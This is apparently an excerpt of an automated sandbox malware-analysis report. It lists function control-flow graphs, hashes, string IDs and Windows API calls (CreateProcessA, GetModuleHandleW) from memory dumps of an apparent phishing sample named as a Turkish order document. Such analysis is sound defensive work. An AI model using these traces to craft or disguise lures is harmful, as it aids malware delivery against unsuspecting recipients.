                                                                                                      • Opcode ID: 040e892ce0603ae5e5d7aee05625ef86bebbe496d4ab28cb2f49602861ab7ca7
                                                                                                      • Instruction ID: e3d7165854481b4b6fd1c25219f3f5addccc5ed042c5340f06f9e828e22f0cdf
                                                                                                      • Opcode Fuzzy Hash: 040e892ce0603ae5e5d7aee05625ef86bebbe496d4ab28cb2f49602861ab7ca7
                                                                                                      • Instruction Fuzzy Hash: 5221D0B0D1461C9BEB18CFABC9443EEFAB6AFC9300F14C06AD41966264DB750945CFA0
                                                                                                      Function 05DDB758 Relevance: 16.3, Strings: 13, Instructions: 92COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 873 5ddb758-5ddb773 874 5ddb7f6-5ddb834 873->874 878 5ddb83d-5ddb840 874->878 879 5ddb847-5ddb849 878->879 880 5ddb778-5ddb77b 879->880 881 5ddb77d 880->881 882 5ddb784-5ddb798 880->882 881->874 881->879 881->882 883 5ddb84e-5ddb869 881->883 885 5ddb79e-5ddb7b2 882->885 886 5ddb895-5ddb8a2 882->886 893 5ddb86b-5ddb871 883->893 894 5ddb881-5ddb894 883->894 885->886 888 5ddb7b8-5ddb7c6 885->888 888->886 889 5ddb7cc-5ddb7df 888->889 889->886 892 5ddb7e5-5ddb7f4 889->892 892->880 895 5ddb875-5ddb877 893->895 896 5ddb873 893->896 895->894 896->894
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: "$8q$8q$LRq$LRq$LRq$$q$$q$$q$$q$$q$$q$$q
                                                                                                      • API String ID: 0-3043932997
                                                                                                      • Opcode ID: 2898099912e3cee6b5f60358cc6bf21360b61bd9b2009ad217c5f988092e09eb
                                                                                                      • Instruction ID: 3ff467b7ac8942b2e910bdfeb29fb46de6cb18fa4bbe100986ae998f8635cce0
                                                                                                      • Opcode Fuzzy Hash: 2898099912e3cee6b5f60358cc6bf21360b61bd9b2009ad217c5f988092e09eb
                                                                                                      • Instruction Fuzzy Hash: 7C31D430F00304DFE7549B69D8496BABBB2FB89305F15847BD545DB381DB7588068B62
                                                                                                      Function 05DDABE6 Relevance: 5.1, Strings: 4, Instructions: 119COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: LRq$$q$$q$$q
                                                                                                      • API String ID: 0-2330862550
                                                                                                      • Opcode ID: 6a2f0a4a13d07185bcde51c6d8ae709b062ebbbef531d1f5291baeacf7678013
                                                                                                      • Instruction ID: 9221b4ab2a254323185052d70dce5f2f6b31d99ea6a7fcaab7a3f1c7a45c7c10
                                                                                                      • Opcode Fuzzy Hash: 6a2f0a4a13d07185bcde51c6d8ae709b062ebbbef531d1f5291baeacf7678013
                                                                                                      • Instruction Fuzzy Hash: ED419E71B01209DFEB108F68D845BBEB7B2FB44712F15816BE546EB2C0E6748942CB65
                                                                                                      Function 05DDACBB Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 898 5ddacbb-5ddacc7 899 5ddacaa 898->899 900 5ddab72-5ddab75 899->900 901 5ddab7e-5ddab90 900->901 902 5ddab77 900->902 901->900 902->901 903 5ddac8c-5ddac93 902->903 904 5ddacc9-5ddaccf 902->904 905 5ddabe9-5ddabee 902->905 906 5ddac98-5ddaca5 902->906 907 5ddac5b-5ddac87 902->907 908 5ddace1-5ddace5 902->908 909 5ddabf0-5ddac03 902->909 910 5ddab92-5ddabb7 902->910 903->900 914 5ddacd1 904->914 915 5ddacd3 904->915 905->900 906->899 907->900 911 5ddace7-5ddacf0 908->911 912 5ddad06 908->912 921 5ddac0b-5ddac0d 909->921 932 5ddabbc-5ddabc6 910->932 933 5ddabb9 910->933 917 5ddacf7-5ddacfa 911->917 918 5ddacf2-5ddacf5 911->918 920 5ddad09-5ddad10 912->920 922 5ddacd5-5ddacde 914->922 915->922 924 5ddad04 917->924 918->924 925 5ddac0f-5ddac15 921->925 926 5ddac1b-5ddac44 921->926 922->908 924->920 928 5ddac19 925->928 929 5ddac17 925->929 934 5ddac4a-5ddac56 926->934 935 5ddad11-5ddad1e 926->935 928->926 929->926 936 5ddabcf-5ddabd2 932->936 937 5ddabc8-5ddabcd 932->937 933->932 934->900 938 5ddabd5-5ddabe7 936->938 937->938 938->900
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: LRq$$q$$q
                                                                                                      • API String ID: 0-167464460
                                                                                                      • Opcode ID: 877cfab5406e628a63252e8edc606121b283f3a1d7eca7cd3139167d4736c3f1
                                                                                                      • Instruction ID: 17b77b00722f2b0e1e1882189874e228cd4178936ee7848b3c4e1da8e595485a
                                                                                                      • Opcode Fuzzy Hash: 877cfab5406e628a63252e8edc606121b283f3a1d7eca7cd3139167d4736c3f1
                                                                                                      • Instruction Fuzzy Hash: 21319D71B00205DBEB108F58C846BBEB3B3FB44722F15816BE146EB2D0E6B4C952C765
                                                                                                      Function 075A1228 Relevance: 3.8, Strings: 3, Instructions: 76COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 941 75a1228-75a1241 942 75a127b-75a12a0 941->942 943 75a1243-75a1245 941->943 944 75a12a7-75a12cc 942->944 943->944 945 75a1247-75a1249 943->945 947 75a12d3-75a130b 944->947 946 75a124f-75a1258 945->946 945->947 950 75a125a-75a1264 946->950 951 75a1266 946->951 952 75a1268-75a126b 950->952 951->952 957 75a1273-75a1278 952->957
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (q$(q$(q
                                                                                                      • API String ID: 0-2103260149
                                                                                                      • Opcode ID: a7e0f653d238b50e4bc61d738aacb6c0d13cc31fab5577cb41cc08c1e5136204
                                                                                                      • Instruction ID: 71626776ea1577ae4763f2da81c5f1f3ded5fe1bbdc60d8ebbbd998960d10cb9
                                                                                                      • Opcode Fuzzy Hash: a7e0f653d238b50e4bc61d738aacb6c0d13cc31fab5577cb41cc08c1e5136204
                                                                                                      • Instruction Fuzzy Hash: F1215B71B085155FE3449EA9A05476F77EBEFC9650724802FE806EB344DE31DC0683D5
                                                                                                      Function 05DDB74A Relevance: 2.6, Strings: 2, Instructions: 89COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 985 5ddb74a 986 5ddb74b-5ddb754 985->986 986->986 987 5ddb756-5ddb773 986->987 988 5ddb778-5ddb77b 987->988 989 5ddb7f6-5ddb834 987->989 990 5ddb77d 988->990 991 5ddb784-5ddb798 988->991 1010 5ddb83d-5ddb840 989->1010 990->989 990->991 993 5ddb84e-5ddb869 990->993 994 5ddb847-5ddb849 990->994 996 5ddb79e-5ddb7b2 991->996 997 5ddb895-5ddb8a2 991->997 1006 5ddb86b-5ddb871 993->1006 1007 5ddb881-5ddb894 993->1007 994->988 996->997 1000 5ddb7b8-5ddb7c6 996->1000 1000->997 1001 5ddb7cc-5ddb7df 1000->1001 1001->997 1005 5ddb7e5-5ddb7f4 1001->1005 1005->988 1008 5ddb875-5ddb877 1006->1008 1009 5ddb873 1006->1009 1008->1007 1009->1007 1010->994
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 8q$8q
                                                                                                      • API String ID: 0-4291441500
                                                                                                      • Opcode ID: 74dbf57ca22e6a2d282c33f4d9b10924e0a5fa73e54efb55c18153675ac1de5a
                                                                                                      • Instruction ID: b3a2d2deaf15ae2e7f608de1bbf4979431e10b83b4dd02a34c38e9860e28fa79
                                                                                                      • Opcode Fuzzy Hash: 74dbf57ca22e6a2d282c33f4d9b10924e0a5fa73e54efb55c18153675ac1de5a
                                                                                                      • Instruction Fuzzy Hash: B931E131F00300DFEB509B68D905AB9BBB6FB88309F2580BBD545DB281DB7688058B61
                                                                                                      Function 05DD9958 Relevance: 2.5, Strings: 2, Instructions: 14COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1012 5dd9958-5dd9968 call 5ddacbb 1013 5dd996e-5dd9970 1012->1013 1014 5dd9988 1013->1014 1015 5dd9972-5dd9978 1013->1015 1016 5dd997c-5dd997e 1015->1016 1017 5dd997a 1015->1017 1016->1014 1017->1014
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $q$$q
                                                                                                      • API String ID: 0-3126353813
                                                                                                      • Opcode ID: 807246f88d071519d65413b1848e2c897b0f553d0d2ea27b0e94354ff762830d
                                                                                                      • Instruction ID: 9aa79be8cdd2d9f766d0ff66ef83d2c6fd306c428c215b7367050ef419f81b91
                                                                                                      • Opcode Fuzzy Hash: 807246f88d071519d65413b1848e2c897b0f553d0d2ea27b0e94354ff762830d
                                                                                                      • Instruction Fuzzy Hash: 83D0C92061020ACFEB391F2AA9163E5F761FB85701F68D466A842A5252DE3A8803C735
                                                                                                      Function 075AEE80 Relevance: 1.8, Strings: 1, Instructions: 596COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1019 75aee80-75aee87 1020 75aee89-75aee93 1019->1020 1021 75aee95 1019->1021 1022 75aee97-75aee99 1020->1022 1021->1022 1023 75aee9b-75aeeba call 75ae2d0 1022->1023 1024 75aeef1-75aeef4 1022->1024 1028 75aeebc-75aeece 1023->1028 1029 75aeed0-75aeeef 1023->1029 1028->1029 1029->1024 1033 75aeef5-75aef4b 1029->1033 1038 75aef5c 1033->1038 1039 75aef4d-75aef5a 1033->1039 1040 75aef5e-75aef60 1038->1040 1039->1040 1041 75aef9a-75aefc8 1040->1041 1042 75aef62-75aef98 call 75ae2d0 1040->1042 1048 75aefca-75af014 call 75a9668 call 75a9930 1041->1048 1042->1048 1055 75af01a-75af01d 1048->1055 1056 75af016-75af018 1048->1056 1057 75af020-75af081 call 75ac2d0 call 75ab208 1055->1057 1056->1057 1065 75af089-75af09a 1057->1065 1066 75af1f2-75af1f6 1065->1066 1067 75af0a0-75af0ac 1065->1067 1070 75af1f8-75af205 1066->1070 1071 75af207 1066->1071 1068 75af0bb-75af0c4 1067->1068 1069 75af0ae-75af0b3 1067->1069 1073 75af0ca-75af0ef 1068->1073 1074 75af243-75af2ba 1068->1074 1069->1068 1072 75af209-75af20b 1070->1072 1071->1072 1075 75af20d-75af220 call 75ae2d0 1072->1075 1076 75af222-75af22e 1072->1076 1073->1074 1082 75af0f5-75af19d call 75a3ba8 1073->1082 1084 75af2bc-75af2be 1074->1084 1085 75af2c0 1074->1085 1087 75af236-75af240 1075->1087 1076->1087 1165 75af1c9 1082->1165 1166 75af19f-75af1c7 call 75a4040 * 2 1082->1166 1089 75af2c3-75af315 call 75ac2d0 1084->1089 1085->1089 1096 75af31b-75af32c 1089->1096 1097 75af5ae-75af5c1 1089->1097 1099 75af32e-75af341 1096->1099 1100 75af346-75af34d 1096->1100 1098 75af5c8 1097->1098 1106 75af5c9 1098->1106 1099->1098 1102 75af3fc-75af402 1100->1102 1103 75af353-75af359 1100->1103 1104 75af4fa-75af507 1102->1104 1105 75af408-75af411 1102->1105 1103->1102 1107 75af35f-75af368 1103->1107 1119 75af58d-75af591 1104->1119 1120 75af50d-75af514 1104->1120 1108 75af413-75af418 1105->1108 1109 75af420-75af426 1105->1109 1106->1106 1111 75af36a-75af36f 1107->1111 1112 75af377-75af37d 1107->1112 1108->1109 1114 75af42c-75af432 1109->1114 1115 75af5c3 1109->1115 1111->1112 1112->1115 1116 75af383-75af389 1112->1116 1121 75af440 1114->1121 1122 75af434-75af43e 1114->1122 1115->1098 1117 75af38b-75af395 1116->1117 1118 75af397 1116->1118 1124 75af399-75af39b 1117->1124 1118->1124 1128 75af599-75af5a8 1119->1128 1125 75af51a-75af523 1120->1125 1126 75af516-75af518 1120->1126 1127 75af442-75af444 1121->1127 1122->1127 1124->1102 1129 75af39d-75af3a6 1124->1129 1125->1115 1131 75af529 1125->1131 1130 75af52e-75af530 1126->1130 1127->1104 1132 75af44a-75af453 1127->1132 1128->1096 1128->1097 1134 75af3a8-75af3ad 1129->1134 1135 75af3b5-75af3bb 1129->1135 1136 75af532-75af53e 1130->1136 1137 75af557-75af55b 1130->1137 1131->1130 1138 75af462-75af468 1132->1138 1139 75af455-75af45a 1132->1139 1134->1135 1135->1115 1141 75af3c1-75af3cf 1135->1141 1136->1115 1142 75af544-75af555 1136->1142 1143 75af55d-75af56c 1137->1143 1144 75af573-75af58b 1137->1144 1138->1115 1145 75af46e-75af474 1138->1145 1139->1138 1141->1102 1156 75af3d1-75af3da 1141->1156 1142->1119 1143->1144 1147 75af56e-75af571 1143->1147 1144->1098 1148 75af482 1145->1148 1149 75af476-75af480 1145->1149 1147->1119 1152 75af484-75af486 1148->1152 1149->1152 1154 75af488-75af491 1152->1154 1155 75af4bc-75af4cb 1152->1155 1159 75af493-75af498 1154->1159 1160 75af4a0-75af4a6 1154->1160 1161 75af4da-75af4e0 1155->1161 1162 75af4cd-75af4d2 1155->1162 1163 75af3e9-75af3ef 1156->1163 1164 75af3dc-75af3e1 1156->1164 1159->1160 1160->1115 1167 75af4ac-75af4ba 1160->1167 1161->1115 1168 75af4e6-75af4f5 1161->1168 1162->1161 1163->1115 1169 75af3f5-75af3f9 1163->1169 1164->1163 1171 75af1cb-75af1cf 1165->1171 1166->1171 1167->1104 1167->1155 1168->1128 1169->1102 1174 75af1d1-75af1d4 1171->1174 1175 75af1d6-75af1e6 call 75a94a0 1171->1175 1178 75af1e9-75af1ec 1174->1178 1175->1178 1178->1066 1178->1067
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Hbq
                                                                                                      • API String ID: 0-2269934739
                                                                                                      • Opcode ID: eb171e942cd7487a494a63fbe77b27a49e498b59d2d5925db616dccc858fa027
                                                                                                      • Instruction ID: bac949b694d1ff4269d82bec1525d1d91be8fdee9b9b7a46007e91ae34a169b0
                                                                                                      • Opcode Fuzzy Hash: eb171e942cd7487a494a63fbe77b27a49e498b59d2d5925db616dccc858fa027
                                                                                                      • Instruction Fuzzy Hash: 8D421BB4A10206AFCB14DF68D584E9EBBF2FF49310F55856AE445AB3A1DB30ED41CB90
                                                                                                      Function 07B77CEC Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1182 7b77cec-7b77d8d 1185 7b77dc6-7b77de6 1182->1185 1186 7b77d8f-7b77d99 1182->1186 1193 7b77e1f-7b77e4e 1185->1193 1194 7b77de8-7b77df2 1185->1194 1186->1185 1187 7b77d9b-7b77d9d 1186->1187 1188 7b77dc0-7b77dc3 1187->1188 1189 7b77d9f-7b77da9 1187->1189 1188->1185 1191 7b77dad-7b77dbc 1189->1191 1192 7b77dab 1189->1192 1191->1191 1195 7b77dbe 1191->1195 1192->1191 1202 7b77e87-7b77f41 CreateProcessA 1193->1202 1203 7b77e50-7b77e5a 1193->1203 1194->1193 1196 7b77df4-7b77df6 1194->1196 1195->1188 1198 7b77e19-7b77e1c 1196->1198 1199 7b77df8-7b77e02 1196->1199 1198->1193 1200 7b77e06-7b77e15 1199->1200 1201 7b77e04 1199->1201 1200->1200 1204 7b77e17 1200->1204 1201->1200 1214 7b77f43-7b77f49 1202->1214 1215 7b77f4a-7b77fd0 1202->1215 1203->1202 1205 7b77e5c-7b77e5e 1203->1205 1204->1198 1207 7b77e81-7b77e84 1205->1207 1208 7b77e60-7b77e6a 1205->1208 1207->1202 1209 7b77e6e-7b77e7d 1208->1209 1210 7b77e6c 1208->1210 1209->1209 1212 7b77e7f 1209->1212 1210->1209 1212->1207 1214->1215 1225 7b77fd2-7b77fd6 1215->1225 1226 7b77fe0-7b77fe4 1215->1226 1225->1226 1227 7b77fd8 1225->1227 1228 7b77fe6-7b77fea 1226->1228 1229 7b77ff4-7b77ff8 1226->1229 1227->1226 1228->1229 1232 7b77fec 1228->1232 1230 7b77ffa-7b77ffe 1229->1230 1231 7b78008-7b7800c 1229->1231 1230->1231 1233 7b78000 1230->1233 1234 7b7801e-7b78025 1231->1234 1235 7b7800e-7b78014 1231->1235 1232->1229 1233->1231 1236 7b78027-7b78036 1234->1236 1237 7b7803c 1234->1237 1235->1234 1236->1237 1239 7b7803d 1237->1239 1239->1239
                                                                                                      APIs
                                                                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07B77F2E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1315240069.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7b70000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 963392458-0
                                                                                                      • Opcode ID: f2a5a7b148e513108361d32e16d8601772a3fc7251519453c066ee3d48ffaf14
                                                                                                      • Instruction ID: 60aaea2860d6493807f5a4bc24a2eb2ca19d11a5df575edb2c8b6ebf7e0b8a36
                                                                                                      • Opcode Fuzzy Hash: f2a5a7b148e513108361d32e16d8601772a3fc7251519453c066ee3d48ffaf14
                                                                                                      • Instruction Fuzzy Hash: DD915CB1D00219CFEB24DF68C841BEDBBB6FF48314F1485A9E819A7280DB759985CF91
                                                                                                      Function 07B77CF8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1240 7b77cf8-7b77d8d 1242 7b77dc6-7b77de6 1240->1242 1243 7b77d8f-7b77d99 1240->1243 1250 7b77e1f-7b77e4e 1242->1250 1251 7b77de8-7b77df2 1242->1251 1243->1242 1244 7b77d9b-7b77d9d 1243->1244 1245 7b77dc0-7b77dc3 1244->1245 1246 7b77d9f-7b77da9 1244->1246 1245->1242 1248 7b77dad-7b77dbc 1246->1248 1249 7b77dab 1246->1249 1248->1248 1252 7b77dbe 1248->1252 1249->1248 1259 7b77e87-7b77f41 CreateProcessA 1250->1259 1260 7b77e50-7b77e5a 1250->1260 1251->1250 1253 7b77df4-7b77df6 1251->1253 1252->1245 1255 7b77e19-7b77e1c 1253->1255 1256 7b77df8-7b77e02 1253->1256 1255->1250 1257 7b77e06-7b77e15 1256->1257 1258 7b77e04 1256->1258 1257->1257 1261 7b77e17 1257->1261 1258->1257 1271 7b77f43-7b77f49 1259->1271 1272 7b77f4a-7b77fd0 1259->1272 1260->1259 1262 7b77e5c-7b77e5e 1260->1262 1261->1255 1264 7b77e81-7b77e84 1262->1264 1265 7b77e60-7b77e6a 1262->1265 1264->1259 1266 7b77e6e-7b77e7d 1265->1266 1267 7b77e6c 1265->1267 1266->1266 1269 7b77e7f 1266->1269 1267->1266 1269->1264 1271->1272 1282 7b77fd2-7b77fd6 1272->1282 1283 7b77fe0-7b77fe4 1272->1283 1282->1283 1284 7b77fd8 1282->1284 1285 7b77fe6-7b77fea 1283->1285 1286 7b77ff4-7b77ff8 1283->1286 1284->1283 1285->1286 1289 7b77fec 1285->1289 1287 7b77ffa-7b77ffe 1286->1287 1288 7b78008-7b7800c 1286->1288 1287->1288 1290 7b78000 1287->1290 1291 7b7801e-7b78025 1288->1291 1292 7b7800e-7b78014 1288->1292 1289->1286 1290->1288 1293 7b78027-7b78036 1291->1293 1294 7b7803c 1291->1294 1292->1291 1293->1294 1296 7b7803d 1294->1296 1296->1296
                                                                                                      APIs
                                                                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07B77F2E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1315240069.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7b70000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 963392458-0
                                                                                                      • Opcode ID: 4c1a597256c4ccdd4b29e06016bf9c7903f2142f27a62427d8920895255c0eec
                                                                                                      • Instruction ID: c409ff314f6574829373e1b620872b11c0b0ebf327fbd05b216593048d937ad4
                                                                                                      • Opcode Fuzzy Hash: 4c1a597256c4ccdd4b29e06016bf9c7903f2142f27a62427d8920895255c0eec
                                                                                                      • Instruction Fuzzy Hash: 14914BB1D00219CFEB24CF68C841BEDBBB6FF48314F1485A9E819A7280DB759985CF91
                                                                                                      Function 0179B6C0 Relevance: 1.7, APIs: 1, Instructions: 202COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1297 179b6c0-179b6df 1298 179b70b-179b70f 1297->1298 1299 179b6e1-179b6ee call 179b084 1297->1299 1301 179b711-179b71b 1298->1301 1302 179b723-179b764 1298->1302 1305 179b6f0 1299->1305 1306 179b704 1299->1306 1301->1302 1308 179b771-179b77f 1302->1308 1309 179b766-179b76e 1302->1309 1358 179b6f6 call 179b968 1305->1358 1359 179b6f6 call 179b95b 1305->1359 1306->1298 1310 179b781-179b786 1308->1310 1311 179b7a3-179b7a5 1308->1311 1309->1308 1313 179b788-179b78f call 179b090 1310->1313 1314 179b791 1310->1314 1316 179b7a8-179b7af 1311->1316 1312 179b6fc-179b6fe 1312->1306 1315 179b840-179b8ba 1312->1315 1318 179b793-179b7a1 1313->1318 1314->1318 1347 179b8bc-179b8be 1315->1347 1348 179b8c1-179b8c4 1315->1348 1319 179b7bc-179b7c3 1316->1319 1320 179b7b1-179b7b9 1316->1320 1318->1316 1323 179b7d0-179b7d9 call 179b0a0 1319->1323 1324 179b7c5-179b7cd 1319->1324 1320->1319 1328 179b7db-179b7e3 1323->1328 1329 179b7e6-179b7eb 1323->1329 1324->1323 1328->1329 1330 179b809-179b80d 1329->1330 1331 179b7ed-179b7f4 1329->1331 1356 179b810 call 179bc68 1330->1356 1357 179b810 call 179bc43 1330->1357 1331->1330 1333 179b7f6-179b806 call 179b0b0 call 179b0c0 1331->1333 1333->1330 1336 179b813-179b816 1338 179b839-179b83f 1336->1338 1339 179b818-179b836 1336->1339 1339->1338 1349 179b8c0 1347->1349 1350 179b8c5-179b900 1347->1350 1348->1350 1349->1348 1351 179b908-179b933 GetModuleHandleW 1350->1351 1352 179b902-179b905 1350->1352 1353 179b93c-179b950 1351->1353 1354 179b935-179b93b 1351->1354 1352->1351 1354->1353 1356->1336 1357->1336 1358->1312 1359->1312
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0179B926
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1310019480.0000000001790000.00000040.00000800.00020000.00000000.sdmp, Offset: 01790000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_1790000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule
                                                                                                      • String ID:
                                                                                                      • API String ID: 4139908857-0
                                                                                                      • Opcode ID: e7a0f70b7439b77c34cbce7de8be9729e4d597786a2fd67e370e281385e205b4
                                                                                                      • Instruction ID: 3a43acec41716a930b751fef346cb308395d102e7c5a0b57dd46a5318928dcb9
                                                                                                      • Opcode Fuzzy Hash: e7a0f70b7439b77c34cbce7de8be9729e4d597786a2fd67e370e281385e205b4
                                                                                                      • Instruction Fuzzy Hash: 2F814974A00B058FDB25DF29E454B5AFBF1FF88204F048A2ED096DBA51E775E809CB91
                                                                                                      Function 0179590D Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1468 179590d-17959d9 CreateActCtxA 1470 17959db-17959e1 1468->1470 1471 17959e2-1795a3c 1468->1471 1470->1471 1478 1795a4b-1795a4f 1471->1478 1479 1795a3e-1795a41 1471->1479 1480 1795a51-1795a5d 1478->1480 1481 1795a60 1478->1481 1479->1478 1480->1481 1483 1795a61 1481->1483 1483->1483
                                                                                                      APIs
                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 017959C9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1310019480.0000000001790000.00000040.00000800.00020000.00000000.sdmp, Offset: 01790000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_1790000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Create
                                                                                                      • String ID:
                                                                                                      • API String ID: 2289755597-0
                                                                                                      • Opcode ID: 5e5addfb4c558376d5ca3c6584e8fed2533fa64effe8dd7f239a52827856a8d7
                                                                                                      • Instruction ID: 63a035d079411c7fb297e92245740eb534c767ecc7284fefd0a3f27187bd614b
                                                                                                      • Opcode Fuzzy Hash: 5e5addfb4c558376d5ca3c6584e8fed2533fa64effe8dd7f239a52827856a8d7
                                                                                                      • Instruction Fuzzy Hash: 4241E0B1C00729CFEB25CFA9C88479DFBB1BF49304F20846AD408AB250DB75694ACF50
                                                                                                      Function 017944C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 017959C9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1310019480.0000000001790000.00000040.00000800.00020000.00000000.sdmp, Offset: 01790000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_1790000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Create
                                                                                                      • String ID:
                                                                                                      • API String ID: 2289755597-0
                                                                                                      • Opcode ID: f1df17d9fd237cc5c0bf541dce44f854c7be9b859791cd79b615483f29f1f17b
                                                                                                      • Instruction ID: 3a7cc14deda3d0b3ff119f6f6e66823d228547b30e3515b7a7955bae9ffcc2dd
